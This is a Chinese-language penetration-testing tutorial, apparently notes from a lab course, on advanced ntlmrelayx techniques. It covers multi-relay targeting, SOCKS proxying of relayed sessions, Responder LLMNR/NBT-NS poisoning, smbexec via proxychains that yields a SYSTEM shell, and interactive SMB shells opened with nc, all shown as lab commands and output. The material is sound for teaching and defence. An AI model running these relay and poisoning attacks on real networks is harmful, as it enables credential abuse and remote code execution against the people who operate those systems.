ntlmrelayx高级利用
除了NTLM Relay over SMB的基本场景利用,还有一些高级的26-tools/ntlmrelayx利用技巧
1. 多重中继
multi-relay 功能可以让我们:
- 识别我们接收
NTLM身份验证的用户(让我们决定是否中继其NTLM身份验证) - 将单个
NTLM身份验证(连接)中继到多个目标
26-tools/ntlmrelayx 通过让客户端在攻击机上本地进行身份验证、获取/提取其身份信息,然后强制它们重新认证,从而将连接中继到目标中继服务器,实现了 multi-relay 功能。
ntlmrelayx的 HTTP 和 SMB 服务器的默认开启此行为- 停用此功能:使用
--no-multirelay选项,(一个传入连接仅做一次攻击)
1.1. 目标定义
由于具备multi-relay特性,目标可以分为命名目标(named targets)或通用目标(general targets);命名目标是指定了身份的目标,而通用目标则是未指定身份的目标。定义目标遵循 URI 格式,其语法由三个组件构成:scheme://authority/path
- scheme:定义目标协议(例如
http或ldap);如果不提供,则默认使用smb协议。使用通配符关键字all可以让ntlmrelayx使用其支持的所有协议。 - authority:指定格式为
域名\用户名@主机:端口。通用目标不使用域名\用户名;只有命名目标才使用该格式。 - path:可选参数,仅在特定攻击中需要。例如,当使用重定向的 HTTP NTLM 身份验证来访问受限的 Web 端点时(比如ADCS的时候)
在攻击单个通用目标时,HTTP 和 SMB 服务器不会默认开启multi-relay。根据目标类型的不同,ntlmrelayx 对多重中继功能的默认设置如下:
| 目标类型 | 示例 | 多重中继默认状态 |
|---|---|---|
| 单个通用目标 | -t 172.16.117.50 |
已禁用 |
| 单个命名目标 | -t smb://INLANEFREIGHT\PETER@172.16.117.50 |
已启用 |
| 多个目标 | -tf relayTargets.txt |
已启用 |
# 仅中继第一个收到的 NTLM 身份验证连接(1:1 关系)
ntlmrelayx.py -t smb://172.16.117.50
# 中继所有属于特定用户 PETER 的连接(M:M 关系)
ntlmrelayx.py -t smb://INLANEFREIGHT\\PETER@172.16.117.50
# 使用 -tf 选项,即使是通用目标也会中继所有收到的连接(M:M 关系)
ntlmrelayx.py -tf relayTarget.txt
# 针对特定用户但仅滥用其第一个成功捕获的连接
ntlmrelayx.py -t smb://INLANEFREIGHT\\PETER@172.16.117.50 --no-multirelay
2. SOCKs 连接
-socks参数会让26-tools/ntlmrelayx开启一个代理,我们可以使用此代理来维持中继后的身份验证会话以及保活,以便后续的其他工具利用,配合 -tf 参数可以开启多个socks代理
首先使用 -socks 选项运行 ntlmrelayx
ntlmrelayx.py -tf relayTargets.txt -smb2support -socks
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
然后开启Responder毒化
python3 Responder.py -I ens192
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
<SNIP>
然后会发现 ntlmrelayx 中继了不同 IP 的多个用户的 NTLM 身份验证,并在 172.16.117.50 和 172.16.117.60 上建立了经过身份验证的会话,且将它们添加到其 SOCKS 服务器中
ntlmrelayx.py -tf relayTargets.txt -smb2support -socks
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] SMBD-Thread-9: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/RMONTY SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/RMONTY@172.16.117.50(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-9: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/RMONTY SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/RMONTY@172.16.117.60(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-9: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, but there are no more targets left!
[*] SMBD-Thread-10: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/PETER SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/PETER@172.16.117.50(445) to active SOCKS connection. Enjoy[*] SMBD-Thread-10: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/PETER SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/PETER@172.16.117.60(445) to active SOCKS connection. Enjoy[*] SMBD-Thread-10: Connection from INLANEFREIGHT/PETER@172.16.117.3 controlled, but there are no more targets left!
[*] SMBD-Thread-11: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/NPORTS SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/NPORTS@172.16.117.50(445) to active SOCKS connection. Enjoy[*] SMBD-Thread-11: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/NPORTS SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/NPORTS@172.16.117.60(445) to active SOCKS connection. Enjoy
-socks 选项会在 ntlmrelayx 内启用命令行界面; 可以使用 help查看帮助
ntlmrelayx> help
Documented commands (type help <topic>):
========================================
help socks
Undocumented commands:
======================
EOF exit finished_attacks startservers stopservers targets
socks 交互命令列出活动会话:
ntlmrelayx> socks
Protocol Target Username AdminStatus Port
-------- ------------- -------------------- ----------- ----
SMB 172.16.117.50 INLANEFREIGHT/RMONTY FALSE 445
SMB 172.16.117.50 INLANEFREIGHT/PETER TRUE 445 SMB 172.16.117.50 INLANEFREIGHT/NPORTS FALSE 445
SMB 172.16.117.60 INLANEFREIGHT/RMONTY FALSE 445
SMB 172.16.117.60 INLANEFREIGHT/PETER FALSE 445
SMB 172.16.117.60 INLANEFREIGHT/NPORTS FALSE 445
这些代理都可以用proxychains来进行利用,配置为socks4 127.0.0.1 1080,且会为我们标注管理员的状态
可以尝试进行连接(无需密码)
proxychains4 -q smbexec.py INLANEFREIGHT/PETER@172.16.117.50 -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
3. 交互式 SMB 客户端 Shell
我们可以使用 --interactive / -i 选项为每个 ntlmrelayx 建立的已认证会话启动一个 SMB 客户端 shell
ntlmrelayx.py -tf relayTargets.txt -smb2support -i
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/RMONTY SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000[*] SMBD-Thread-5: Connection from INLANEFREIGHT/RMONTY@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/RMONTY SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11001[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.50
[*] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/NPORTS SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11002[*] SMBD-Thread-8: Connection from INLANEFREIGHT/NPORTS@172.16.117.3 controlled, attacking target smb://172.16.117.60
[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/NPORTS SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11003<SNIP>
ntlmrelayx为中继目标上的每个已认证会话都启动了交互式 SMB 客户端 Shell;- 我们可以使用nc来进行连接(但注意,这些会话是一次性的)
nc -nv 127.0.0.1 11000
Connection to 127.0.0.1 11000 port [tcp/*] succeeded!
Type help for list of commands
# shares
ADMIN$
C$
Finance
IPC$